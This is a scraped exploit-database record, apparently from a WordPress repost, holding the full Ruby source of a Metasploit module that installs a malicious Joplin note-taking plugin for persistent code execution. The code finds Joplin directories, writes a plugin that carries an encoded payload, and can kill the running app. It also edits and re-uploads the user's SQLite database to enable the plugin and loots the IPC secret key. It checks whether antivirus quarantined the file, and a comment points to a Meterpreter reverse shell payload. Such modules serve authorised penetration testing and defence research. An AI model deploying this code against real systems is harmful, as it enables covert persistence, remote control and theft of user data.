{“lastseen”:”2026-06-19T19:36:59″,”description”:”This module installs a malicious Joplin plugin .jpl into the target’s Joplin plugin directory. The plugin executes the payload each time Joplin is launched, providing persistent code execution. Joplin can not be running at the time of plugin…”,”published”:”2026-06-19T19:03:23″,”modified”:”2026-06-19T19:03:23″,”type”:”metasploit”,”title”:”Joplin Plugin Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-PERSISTENCE-JOPLIN_PLUGIN-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# frozen_string_literal: true\\n\\n##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire ‘sqlite3’\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n include Msf::Post::File\\n include Msf::Post::Unix # whoami\\n include Msf::Auxiliary::Report\\n include Msf::Exploit::Local::Persistence\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Joplin Plugin Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module installs a malicious Joplin plugin (.jpl) into the target’s\\n Joplin plugin directory. The plugin executes the payload each time Joplin\\n is launched, providing persistent code execution. Joplin can not\\n be running at the time of plugin installation, or it will be overwriten\\n at shutdown. The module can optionally kill Joplin if it is detected running.\\n\\n Tested against Joplin 3.6.11 on Windows 10, 3.6.10 on Kali\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘h00die’ # Module\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2017-12-07’, # initial joplin release date\\n ‘SessionTypes’ =\\u003e [ ‘shell’, ‘meterpreter’ ],\\n ‘Privileged’ =\\u003e false,\\n ‘References’ =\\u003e [\\n [ ‘URL’, ‘https:\/\/joplinapp.org\/help\/api\/get_started\/plugins\/’ ],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1176_SOFTWARE_EXTENSIONS]\\n ],\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Platform’ =\\u003e %w[linux windows],\\n ‘Payload’ =\\u003e {\\n ‘Space’ =\\u003e 8191,\\n ‘DisableNops’ =\\u003e true\\n },\\n ‘Targets’ =\\u003e [\\n [‘Windows’, { ‘Platform’ =\\u003e ‘windows’ }], # set payload payload\/cmd\/windows\/powershell\/x64\/meterpreter\/reverse_tcp\\n [‘Linux’, { ‘Platform’ =\\u003e %w[linux unix] }],\\n # [‘OSX’, { ‘Platform’ =\\u003e %w[linux unix] }]\\n ],\\n ‘Notes’ =\\u003e {\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, CONFIG_CHANGES]\\n },\\n ‘DefaultTarget’ =\\u003e 0\\n )\\n )\\n\\n register_options([\\n OptString.new(‘NAME’, [false, ‘Name of the plugin’, ”]),\\n OptString.new(‘DESCRIPTION’, [false, ‘Description of the plugin’, ”]),\\n OptString.new(‘USER’, [false, ‘User to target, or current user if blank’, ”]),\\n OptString.new(‘DATABASE’, [false, ‘Full path to Joplin database.sqlite on target (auto-detected if blank)’, ”]),\\n OptBool.new(‘KILLJOPLIN’, [false, ‘Kill Joplin if it is running before modifying the database’, false])\\n ])\\n deregister_options(‘WritableDir’)\\n end\\n\\n def plugin_name\\n # memoized so manifest and install path always use the same name\\n @plugin_name ||= if datastore[‘NAME’].blank?\\n rand_text_alphanumeric(4..10)\\n else\\n datastore[‘NAME’]\\n end\\n end\\n\\n def plugin_id\\n @plugin_id ||= \\”com.#{rand_text_alpha(4..8).downcase}.#{plugin_name}\\”\\n end\\n\\n def manifest\\n {\\n ‘manifest_version’ =\\u003e 1,\\n ‘id’ =\\u003e plugin_id,\\n ‘app_min_version’ =\\u003e ‘3.2’,\\n ‘version’ =\\u003e ‘1.0.0’,\\n ‘name’ =\\u003e plugin_name,\\n ‘description’ =\\u003e datastore[‘DESCRIPTION’].blank? ? ” : datastore[‘DESCRIPTION’],\\n ‘author’ =\\u003e ”,\\n ‘homepage_url’ =\\u003e ”,\\n ‘repository_url’ =\\u003e ”,\\n ‘keywords’ =\\u003e [],\\n ‘categories’ =\\u003e [],\\n ‘screenshots’ =\\u003e [],\\n ‘icons’ =\\u003e {},\\n ‘promo_tile’ =\\u003e {}\\n }.to_json\\n end\\n\\n def index_js\\n ::File.read(::File.join(Msf::Config.data_directory, ‘exploits’, ‘joplin_plugin’, ‘index.js.template’))\\n end\\n\\n def create_plugin_tar(pload)\\n tar = StringIO.new\\n Rex::Tar::Writer.new(tar) do |t|\\n t.add_file(‘manifest.json’, 0o644) do |f|\\n f.write(manifest)\\n end\\n t.add_file(‘index.js’, 0o644) do |f|\\n f.write(index_js)\\n end\\n t.add_file(‘external’, 0o644) do |f|\\n f.write([pload].pack(‘m0’))\\n end\\n end\\n tar.seek(0)\\n data = tar.read\\n tar.close\\n data\\n end\\n\\n def target_user\\n return datastore[‘USER’] unless datastore[‘USER’].blank?\\n\\n return create_process(‘cmd.exe’, args: [‘\/c’, ‘echo’, ‘%USERNAME%’]).strip if [‘windows’, ‘win’].include? session.platform\\n\\n whoami\\n end\\n\\n def joplin_base_dirs\\n user = target_user\\n vprint_status(\\”Target user: #{user}\\”)\\n\\n case session.platform\\n when ‘windows’, ‘win’\\n [\\n \\”C:\\\\\\\\Users\\\\\\\\#{user}\\\\\\\\.config\\\\\\\\joplin-desktop\\”,\\n \\”C:\\\\\\\\Users\\\\\\\\#{user}\\\\\\\\.config\\\\\\\\joplin\\”,\\n \\”C:\\\\\\\\Users\\\\\\\\#{user}\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\joplin\\”,\\n \\”C:\\\\\\\\Users\\\\\\\\#{user}\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\joplin-desktop\\”\\n ]\\n # when ‘osx’\\n # [\\n # \\”\/Users\/#{user}\/Library\/Application Support\/joplin\\”,\\n # \\”\/Users\/#{user}\/Library\/Application Support\/joplin-desktop\\”\\n # ]\\n else # linux\\n home = user == ‘root’ ? ‘\/root’ : \\”\/home\/#{user}\\”\\n [\\n \\”#{home}\/.config\/joplin\\”,\\n \\”#{home}\/.config\/joplin-desktop\\”,\\n \\”#{home}\/snap\/joplin-desktop\/current\/.config\/joplin-desktop\\”\\n ]\\n end\\n end\\n\\n def check\\n joplin_base_dirs.each do |dir|\\n return CheckCode::Appears(\\”Joplin installation found: #{dir}\\”) if directory?(dir)\\n end\\n\\n CheckCode::Safe(‘No Joplin installation found’)\\n end\\n\\n def windows?\\n [‘windows’, ‘win’].include?(session.platform)\\n end\\n\\n def joplin_running?\\n if windows?\\n !create_process(‘powershell’, args: [‘-Command’, ‘Get-Process -Name Joplin* -ErrorAction SilentlyContinue’]).strip.empty?\\n else\\n !create_process(‘pgrep’, args: [‘-i’, ‘joplin’]).strip.empty?\\n end\\n end\\n\\n def kill_joplin\\n if windows?\\n create_process(‘powershell’, args: [‘-Command’, ‘Stop-Process -Name Joplin -Force -ErrorAction SilentlyContinue’])\\n else\\n create_process(‘pkill’, args: [‘-i’, ‘joplin’])\\n end\\n Rex.sleep(2)\\n if joplin_running?\\n print_warning(‘Joplin is still running after kill attempt’)\\n return false\\n end\\n print_good(‘Joplin killed successfully’)\\n true\\n end\\n\\n def find_joplin_database\\n user = target_user\\n print_status(‘Searching for Joplin database…’)\\n\\n if session.type == ‘meterpreter’ \\u0026\\u0026 windows?\\n search_root = \\”C:\\\\\\\\Users\\\\\\\\#{user}\\”\\n begin\\n results = session.fs.file.search(search_root, ‘database.sqlite’, true)\\n results.each do |r|\\n path = \\”#{r[‘path’]}\\\\\\\\#{r[‘name’]}\\”\\n vprint_status(\\” Found: #{path}\\”)\\n return path if path.downcase.include?(‘joplin’)\\n end\\n rescue Rex::Post::Meterpreter::RequestError =\\u003e e\\n print_warning(\\”Meterpreter file search failed: #{e.message}\\”)\\n end\\n return nil\\n end\\n\\n # Shell session fallback\\n if windows?\\n results = create_process(‘powershell’, args: [‘-Command’, \\”Get-ChildItem -Path ‘C:\\\\\\\\Users\\\\\\\\#{user}’ -Recurse -Filter ‘database.sqlite’ -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName\\”]).strip\\n else\\n home = user == ‘root’ ? ‘\/root’ : \\”\/home\/#{user}\\”\\n results = create_process(‘find’, args: [home, ‘-name’, ‘database.sqlite’]).strip\\n end\\n\\n results.lines.each do |path|\\n path = path.strip\\n next if path.empty?\\n\\n vprint_status(\\” Found: #{path}\\”)\\n return path if path.downcase.include?(‘joplin’)\\n end\\n\\n nil\\n end\\n\\n def register_plugin(base_dir, plugin_id)\\n sep = windows? ? ‘\\\\\\\\’ : ‘\/’\\n\\n db_path = if datastore[‘DATABASE’].present?\\n datastore[‘DATABASE’]\\n else\\n \\”#{base_dir}#{sep}database.sqlite\\”\\n end\\n\\n unless file?(db_path)\\n print_warning(\\”Joplin database not found at: #{db_path}\\”)\\n db_path = find_joplin_database\\n if db_path.nil?\\n print_warning(‘Set DATABASE to the correct path and re-run, or enable the plugin manually via Tools \\u003e Plugins’)\\n return\\n end\\n print_good(\\”Found database at: #{db_path}\\”)\\n end\\n\\n print_status(‘Downloading Joplin database…’)\\n db_data = read_file(db_path)\\n\\n loot_path = store_loot(\\n ‘joplin.database’,\\n ‘application\/x-sqlite3’,\\n session.session_host,\\n db_data,\\n ‘database.sqlite’,\\n ‘Joplin SQLite database’\\n )\\n print_good(\\”Database saved to loot: #{loot_path}\\”)\\n\\n begin\\n db = SQLite3::Database.new(loot_path)\\n\\n # Load all rows in Ruby and filter client-side: the unique index can become\\n # corrupted (orphaned rows not tracked by the index), causing INSERT OR REPLACE\\n # to miss stale entries. Joplin does a full table scan on startup and crashes\\n # if it finds two rows with the same key.\\n all_rows = db.execute(‘SELECT rowid, key, value FROM settings’)\\n existing = all_rows.select { |r| r[1] == ‘plugins.states’ }\\n vprint_status(\\”Found #{existing.length} existing plugins.states row(s)\\”)\\n\\n states = {}\\n if existing.any?\\n begin\\n states = JSON.parse(existing.first[2])\\n rescue JSON::ParserError =\\u003e e\\n print_warning(\\”Could not parse existing plugins.states: #{e.message}\\”)\\n end\\n existing.each { |row| db.execute(‘DELETE FROM settings WHERE rowid=?’, [row[0]]) }\\n end\\n\\n states[plugin_id] = { ‘enabled’ =\\u003e true, ‘deleted’ =\\u003e false, ‘hasBeenUpdated’ =\\u003e false }\\n new_json = JSON.generate(states)\\n tbl = Rex::Text::Table.new(\\n ‘Header’ =\\u003e ‘Joplin Plugin States’,\\n ‘Indent’ =\\u003e 4,\\n ‘Columns’ =\\u003e [‘Plugin ID’, ‘Enabled’, ‘Deleted’, ‘Has Been Updated’]\\n )\\n states.each { |id, s| tbl \\u003c\\u003c [id, s[‘enabled’], s[‘deleted’], s[‘hasBeenUpdated’]] }\\n print_line(tbl.to_s)\\n # Use a SQL literal for the key: the sqlite3 gem binds Ruby string parameters\\n # as BLOB in MSF’s encoding context, but Joplin queries with WHERE key=’plugins.states’\\n # (TEXT literal), which never matches a BLOB \u2014 the plugin would be invisible.\\n db.execute(\\”INSERT INTO settings (key, value) VALUES (‘plugins.states’, ?)\\”, [new_json])\\n db.close\\n rescue LoadError\\n print_warning(‘sqlite3 gem not available \u2014 enable the plugin manually via Tools \\u003e Plugins’)\\n return\\n rescue SQLite3::Exception =\\u003e e\\n print_warning(\\”Failed to modify database: #{e.message}\\”)\\n return\\n end\\n\\n print_status(‘Re-uploading modified database…’)\\n write_file(db_path, ::File.binread(loot_path))\\n\\n [‘-wal’, ‘-shm’].each do |ext|\\n wal = \\”#{db_path}#{ext}\\”\\n next unless file?(wal)\\n\\n print_status(\\”Removing #{ext} file to prevent WAL replay: #{wal}\\”)\\n rm_f(wal)\\n end\\n\\n print_good(‘Plugin registered in Joplin database’)\\n [loot_path, db_path]\\n end\\n\\n def loot_ipc_key(base_dir)\\n sep = windows? ? ‘\\\\\\\\’ : ‘\/’\\n key_path = \\”#{base_dir}#{sep}ipc_secret_key.txt\\”\\n unless file?(key_path)\\n print_warning(\\”ipc_secret_key.txt not found at #{key_path}\\”)\\n return\\n end\\n key_data = read_file(key_path)\\n loot_path = store_loot(\\n ‘joplin.ipc_secret_key’,\\n ‘text\/plain’,\\n session.session_host,\\n key_data,\\n ‘ipc_secret_key.txt’,\\n ‘Joplin IPC secret key’\\n )\\n print_good(\\”IPC secret key saved to loot: #{loot_path}\\”)\\n end\\n\\n def install_persistence\\n print_status(\\”Using plugin name: #{plugin_id}\\”)\\n\\n base_dir = joplin_base_dirs.find { |dir| directory?(dir) }\\n fail_with(Failure::NotFound, ‘No Joplin installation found’) if base_dir.nil?\\n\\n loot_ipc_key(base_dir)\\n\\n sep = windows? ? ‘\\\\\\\\’ : ‘\/’\\n plugin_dir = \\”#{base_dir}#{sep}plugins\\”\\n plugin_path = \\”#{plugin_dir}#{sep}#{plugin_id}.jpl\\”\\n\\n unless directory?(plugin_dir)\\n print_status(\\”Creating plugins directory: #{plugin_dir}\\”)\\n mkdir(plugin_dir, cleanup: false)\\n end\\n\\n jpl_data = create_plugin_tar(payload.encoded)\\n print_status(\\”Writing plugin to: #{plugin_path} (#{jpl_data.length} bytes)\\”)\\n write_file(plugin_path, jpl_data)\\n\\n # Verify AV did not immediately quarantine\/delete the file\\n if file?(plugin_path)\\n print_good(\\”Plugin written to #{plugin_path}\\”)\\n else\\n print_warning(\\”Plugin file missing after write \u2014 may have been quarantined by AV: #{plugin_path}\\”)\\n end\\n\\n if joplin_running?\\n if datastore[‘KILLJOPLIN’]\\n print_status(‘Joplin is running \u2014 killing it before modifying the database…’)\\n if kill_joplin\\n result = register_plugin(base_dir, plugin_id)\\n else\\n print_warning(‘Could not kill Joplin \u2014 skipping database registration.’)\\n print_warning(‘Close Joplin manually and re-run this module so the plugin registration persists.’)\\n result = nil\\n end\\n else\\n print_warning(‘Joplin is currently running \u2014 the database modification will be overwritten when Joplin closes.’)\\n print_warning(‘Close Joplin completely and re-run this module, or set KILLJOPLIN true to kill it automatically.’)\\n print_warning(‘The .jpl file has been written; only the database registration step will be skipped.’)\\n result = nil\\n end\\n else\\n result = register_plugin(base_dir, plugin_id)\\n end\\n\\n if windows?\\n @clean_up_rc \\u003c\\u003c \\”del \/f \\\\\\”#{plugin_path}\\\\\\”\\\\n\\”\\n else\\n @clean_up_rc \\u003c\\u003c \\”rm -f \\\\\\”#{plugin_path}\\\\\\”\\\\n\\”\\n end\\n\\n if result\\n original_db_loot, db_path = result\\n @clean_up_rc \\u003c\\u003c \\”upload #{original_db_loot} #{db_path}\\\\n\\”\\n end\\n\\n if result\\n print_status(‘Joplin is not running \u2014 launch it to trigger the plugin’)\\n end\\n print_status(\\”If the payload does not execute, check log files in #{base_dir} for plugin errors\\”)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/persistence\/joplin_plugin.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/persistence\/joplin_plugin\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-19T19:36:59″,”description”:”This module installs a malicious Joplin plugin .jpl into the target’s Joplin plugin directory. The plugin executes the payload each time Joplin is launched, providing…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-64424","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n